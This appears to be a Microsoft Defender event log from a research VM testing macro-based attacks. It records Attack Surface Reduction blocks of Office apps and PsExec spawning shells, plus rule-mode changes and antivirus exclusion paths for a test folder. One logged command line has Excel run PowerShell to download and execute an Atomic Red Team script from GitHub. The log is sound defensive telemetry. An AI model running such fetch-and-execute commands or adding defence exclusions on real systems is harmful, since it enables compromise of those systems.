Product Version: 4.18.23100.2009
11/17/2023 05:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2357
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T17:23:27.753Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:18:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2341
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-17T17:18:38.414Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:18:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2340
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:18:05.565Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: powershell.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:17:08 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2339
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:17:08.694Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:16:52 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2338
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:16:52.179Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:44:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2319
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T16:44:11.592Z
User: researchvmhaa\research
Path: C:\Windows\System32\rundll32.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"
Involved File: C:\Users\research\Desktop\macs\mac5.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:43:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2318
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:43:58.799Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:43:58 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2317
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:43:58.666Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:38:21 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2316
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop = 0x0
11/17/2023 04:37:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2311
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop\macs = 0x0
11/17/2023 04:35:02 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2297
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T16:35:02.260Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\mac1.xls"
Involved File: C:\Users\research\Desktop\mac1.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2291
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2290
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2289
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2288
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2287
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2286
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2285
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2284
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2283
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2282
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2281
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2280
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2279
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2278
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2277
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
11/17/2023 04:29:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2276
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
11/17/2023 04:29:02 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2273
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-17T16:29:02.666Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:27:34 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2272
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T16:27:34.524Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd.exe"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 04:05:15 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2083
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-17T16:05:15.532Z
User: NT AUTHORITY\SYSTEM
Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline: "C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe"
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 03:59:51 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2082
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T15:59:51.981Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 03:59:16 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2081
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T15:59:16.861Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 09:28:52 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1903
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1867
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1866
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
11/16/2023 05:36:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1865
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
